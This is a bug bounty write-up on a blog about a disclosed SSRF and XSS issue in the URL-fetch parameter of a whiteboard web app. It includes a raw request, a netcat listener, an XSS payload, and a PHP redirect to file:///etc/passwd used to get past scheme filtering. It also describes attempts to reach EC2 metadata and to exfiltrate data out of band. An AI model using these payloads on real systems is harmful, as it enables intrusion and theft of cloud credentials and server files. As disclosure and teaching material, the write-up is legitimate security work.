“Exploiting a Single Parameter”

Hisham Mir
Apr 6, 2018 · 5 min read

Hello There Friends and All Community Members. It's been Ages Since i Did a Write Up As I like to Work Silently. From Past few Days i have seen many write ups while scrolling my Facebook News Feed , So I also thought to do a Write Up and Contribute to this Great Community. Enough of The Boring Words , Now Let's Come to the Point :P

I Hunted in a HackerOne Private Program And found Many Low-Medium Bugs and Left the site As most of the Hunters Do :D , After Few Days i was going through the website there was a Web app of Whiteboard Sketching that was running on Flash. *Ughh ! Why I Didn’t See this Before :/* .
As you Guys Know Most of this Online White Board Softwares Have Features like Add Image , Upload Video and Etc. Having a Hacker’s Mindset We go After finding the IMPORT BY URL Feature , So i also Got an Idea to Look for it

After I Found the Import by Url Parameter I Immediately Fired Up My Server And Passed this Request :

GET /fetch?token=a20378e1_6185_11e6_b4b0_0b0c74443f0c&url=http://54.213.234.107:11111 HTTP/1.1
Host: Site.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: [REDACTED]
Cookie: [COOKIES HERE] Connection: keep-alive

Response In my Terminal :

hishammir@hishammir:~$ nc -v -l 11111
Listening on [0.0.0.0] (family 0, port 11111)
Connection from [54.xxx.xxx.xxx] port 11111 [tcp/*] accepted (family 2, sport 41400)

SUCCESS !

So a possibility of SSRF was there , I also tried scanning external host’s Ports to Differentiate between open and closed ports. I used Scanme.nmap.org
In which Port 22 is Opened :

Response on Hitting a Closed Port :

Response on Hitting a Open Port :

So To Exploit it further I started checking on Which Protocols it was Performing Connections and Sadly it was only HTTP & HTTPS, So no SSRF:(

As the Image Fetch Endpoint was on GET Request i had a quick thought of Opening the Endpoint URL in the browser :

/fetch?token=a20378e1_6185_11e6_b4b0_0b0c74443f0c&url=http://54.213.234.107:11111

So the URL Parameter Here was fetching the Data from The URL i gave and executing it Locally , As an Example i wrote google.com in URL parameter and Google Homepage was loaded locally. So Moving Forward I tried finding XSS using the URL parameter and all i was getting a Invalid URL error :/

No XSS :/

As i thought that the URL parameter is Fetching the source code of the website we provide , So Why not Let him fetch him some JS :P

So what i did was i created a html file with this simple xss payload and hosted it on my Server.

<script>alert(document.domain)</script>

The Result was :

XSSED !

Same like this I created a simple php file with the below code and hosted on my Server and gave it to the URL parameter to fetch it and execute.

<?php
header(‘Set-Cookie: Game over’);
?>

Response :

Many of You guys must be thinking why this noob is not trying for the RCE :D

After all this I did try hard for RCE or Reading Server Files , So what I did to achieve RCE ?

Next, i fiddled with different schemes but http, https were only possible, $_POST was blocked too, hence gopher:// file:// dict:// seems to be blocked, But by utilising the same Fact of Resource Sharing i created a script like :

<?php
header(‘Location: file:///etc/passwd’);
?>

That would bypass the Initial file:// scheme blocking restriction and server would itself go to search for file:///etc/passwd which Gives Internal Server Error, hence that was strong motivation that Brute forcing the header with traversal of path just like
header(‘Location site.com/../../etc/passwd);
or many more enumeration could have resulted into successful reading ..it requires time to enumerate. But no Luck :/

Next, what i thought had the Strongest relevance was Out of Band Data Exfiltration, I used my own server As “HTTP” was working fine, i retrieved data , which i received in Chunks from an “Internal Server” whose IP was 54.82.xxx.xxx .. That is Strong signal of OOB .

So They were using ec2 instance on 54.82.xxx.xxx from which i received chunks But the common ports were closed of the server and it was opening 80 once requested file_get_contents(); So utilising this, I tried Reading EC2 Instances of their Internal server using the URL parameter but there was some type of Whitelisting or what !

For example: https://75.101.xxx.xx/latest/user-data/ if i opened simply in browser isn’t publicly accessible but if u put in url= parameter than the response was different , Similarly , I tried retrieving IP’s of the website via NslookUP and tried Accessing the IP’s putting them in the URL parameter hoping to Hit a Intranet Maybe ?

For all the Bounty Conscious Guys , A Bounty of $2.5k Was rewarded for the Issue.

For Past Blog Posts Do Visit our Blog blog.securitywall.co

Thank Uh Guys For Reading this!

Drop your comments below if you have a question ;)

SecurityWall

Securitywall Official Blog

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store